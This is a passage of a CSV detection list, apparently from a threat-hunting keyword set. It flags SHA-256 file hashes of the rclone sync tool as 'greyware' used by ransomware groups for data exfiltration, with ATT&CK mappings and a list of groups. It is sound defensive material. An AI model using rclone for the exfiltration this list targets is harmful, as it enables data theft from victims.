"*ae0be925e6ad15b6c85814746d17876295c1736a91665a44c22cd49a431fd7cc*",".{0,1000}ae0be925e6ad15b6c85814746d17876295c1736a91665a44c22cd49a431fd7cc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ae3f83840abeaed5df17c82b7d8f318e88e40642d31297c2d0c4ab80ada62335*",".{0,1000}ae3f83840abeaed5df17c82b7d8f318e88e40642d31297c2d0c4ab80ada62335.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ae6c4d028975b5126767dcfe4f1c1f0de1c9f729c123263aa35d321df918c7c8*",".{0,1000}ae6c4d028975b5126767dcfe4f1c1f0de1c9f729c123263aa35d321df918c7c8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*aecbb25cfb2d6ef207b23febe8726e86cc0a9973948c150613222084af331cdc*",".{0,1000}aecbb25cfb2d6ef207b23febe8726e86cc0a9973948c150613222084af331cdc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*af0d92194012434a1e01f038d1bd536922f5187c5f645e0a4708668690020fe9*",".{0,1000}af0d92194012434a1e01f038d1bd536922f5187c5f645e0a4708668690020fe9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*af181d53332e34c71599eaa567124a3b8b28aef141152e94d9b1a52da657ee6b*",".{0,1000}af181d53332e34c71599eaa567124a3b8b28aef141152e94d9b1a52da657ee6b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*af1baf66006d9f7ba069b6a513d894ef20423cfda9bab7cd6342eeab0fa51651*",".{0,1000}af1baf66006d9f7ba069b6a513d894ef20423cfda9bab7cd6342eeab0fa51651.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*af342555f255fdd90d55abff65b84a479e95816f3117361cb924f99ba6a4542a*",".{0,1000}af342555f255fdd90d55abff65b84a479e95816f3117361cb924f99ba6a4542a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*af4699cdafb91bb625dbe8385af2c29bb15de6dd613f0d2e4a5c64e0d3ef6302*",".{0,1000}af4699cdafb91bb625dbe8385af2c29bb15de6dd613f0d2e4a5c64e0d3ef6302.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*af5c3753d790ac2ba4a7c4e74951e15fee5cf08153a19f6e40b0ab3f90a65f44*",".{0,1000}af5c3753d790ac2ba4a7c4e74951e15fee5cf08153a19f6e40b0ab3f90a65f44.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*af7050d7ca89003dd9337ad18cfe03d679b6a3bbe0171dd9b891a3e096abd97e*",".{0,1000}af7050d7ca89003dd9337ad18cfe03d679b6a3bbe0171dd9b891a3e096abd97e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*af9ed703387a179d2156267b03855f46f5777a9f0351be87d21d9430e8c7b854*",".{0,1000}af9ed703387a179d2156267b03855f46f5777a9f0351be87d21d9430e8c7b854.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*afa44d33efcaf2247f5cfc5ed962a265cecd86ffd558b933db4179e95f8cc2e3*",".{0,1000}afa44d33efcaf2247f5cfc5ed962a265cecd86ffd558b933db4179e95f8cc2e3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*afbef976a82c23c5bd1af109a1cadba5b8ca539663985cf068b228cdde72d44f*",".{0,1000}afbef976a82c23c5bd1af109a1cadba5b8ca539663985cf068b228cdde72d44f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*afc788e3968fd29fc6ba5b9e1eded37e699764cf9e08a203936a3e235039d602*",".{0,1000}afc788e3968fd29fc6ba5b9e1eded37e699764cf9e08a203936a3e235039d602.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*afef35513c7ce89e9ed9962e2c44c604587de1faa317d9fd3bf6590dc3be8658*",".{0,1000}afef35513c7ce89e9ed9962e2c44c604587de1faa317d9fd3bf6590dc3be8658.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*b00f3120e03aa38f2472730d2b1bbbb4e00af3f5130e8b6d14a8b9f3ee96bece*",".{0,1000}b00f3120e03aa38f2472730d2b1bbbb4e00af3f5130e8b6d14a8b9f3ee96bece.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*b065a47eb4b282f716c57381099ee39456910bacb6887fdb6a7c86cc571dfbf0*",".{0,1000}b065a47eb4b282f716c57381099ee39456910bacb6887fdb6a7c86cc571dfbf0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*b0d11385c1a17d7085834e7d163eab9d78acea55d406862770db20ba18ba16f8*",".{0,1000}b0d11385c1a17d7085834e7d163eab9d78acea55d406862770db20ba18ba16f8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*b0f71544821d4a67e6462c8355b91b5c4d1e1f4dd6f8e84fd08879aff1669de3*",".{0,1000}b0f71544821d4a67e6462c8355b91b5c4d1e1f4dd6f8e84fd08879aff1669de3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*b0f78c07fd76cc1ba1d663dc2b4b798c635c94d2369b62805399be8f43d3565f*",".{0,1000}b0f78c07fd76cc1ba1d663dc2b4b798c635c94d2369b62805399be8f43d3565f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*b1251cfdcbc44356e001057524c3e2f7be56d94546273d10143bfa1148c155ab*",".{0,1000}b1251cfdcbc44356e001057524c3e2f7be56d94546273d10143bfa1148c155ab.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*b12e3cfdb977c2a9f5a26dc0db4b828b28b98dc3f5e635c7833d5b50cfcca1ea*",".{0,1000}b12e3cfdb977c2a9f5a26dc0db4b828b28b98dc3f5e635c7833d5b50cfcca1ea.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*b14d2059935ad7f318588eaf13d283d7678279979a317a571101c1c45f147f36*",".{0,1000}b14d2059935ad7f318588eaf13d283d7678279979a317a571101c1c45f147f36.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*b19ad25b155f7c1f9b7f725df787c80ea67daa07a9cee548fd8420f3918b1e91*",".{0,1000}b19ad25b155f7c1f9b7f725df787c80ea67daa07a9cee548fd8420f3918b1e91.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*b1abf65d6e9817ce5e2be532edeeb45cbd9ad671e8325d9d145e4d3c3ad41715*",".{0,1000}b1abf65d6e9817ce5e2be532edeeb45cbd9ad671e8325d9d145e4d3c3ad41715.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*b1accc32bce8291fbbe929cac3e7e2663e4667e55aff1001257f627eda478fbc*",".{0,1000}b1accc32bce8291fbbe929cac3e7e2663e4667e55aff1001257f627eda478fbc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*b1b0d774ea2e40ee9a6e9a3c4704fce91af0025abd58dfdd9131fb8485e3de4b*",".{0,1000}b1b0d774ea2e40ee9a6e9a3c4704fce91af0025abd58dfdd9131fb8485e3de4b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*b1d5414f66e4d4ffb2e2d67b26a484d55fc2113e8cedeca8794bd2c358897d0e*",".{0,1000}b1d5414f66e4d4ffb2e2d67b26a484d55fc2113e8cedeca8794bd2c358897d0e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*b1e6103ec1b2468d5ec2f2367897f7cc20bbc9256af81b699e8d138aeb1267c6*",".{0,1000}b1e6103ec1b2468d5ec2f2367897f7cc20bbc9256af81b699e8d138aeb1267c6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*b22cf68891d45c2280d22c9139bb67c3bad35675e0571b024256f67bc001ae0b*",".{0,1000}b22cf68891d45c2280d22c9139bb67c3bad35675e0571b024256f67bc001ae0b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*b22d38050a7a8f95ebad69f27d48c792813865bef8faccbaced6e9bd4a3b8364*",".{0,1000}b22d38050a7a8f95ebad69f27d48c792813865bef8faccbaced6e9bd4a3b8364.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*b28be6193bc56da75aab6d29ff6b02bb58c57974447bbff3fecf106077e4b35c*",".{0,1000}b28be6193bc56da75aab6d29ff6b02bb58c57974447bbff3fecf106077e4b35c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*b2b16cfd0ddbf519fb626a0b303afa172043fce9fda1d3dd238b636814b75d6b*",".{0,1000}b2b16cfd0ddbf519fb626a0b303afa172043fce9fda1d3dd238b636814b75d6b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*b2d67e08d8c55a49f1b18bac7457fcd831dbb13dbdd1b05c119ace65ccdf7b31*",".{0,1000}b2d67e08d8c55a49f1b18bac7457fcd831dbb13dbdd1b05c119ace65ccdf7b31.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*b2f532c5c0922778360f918b4823e415b4309653689dd131b9e3514045f94613*",".{0,1000}b2f532c5c0922778360f918b4823e415b4309653689dd131b9e3514045f94613.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
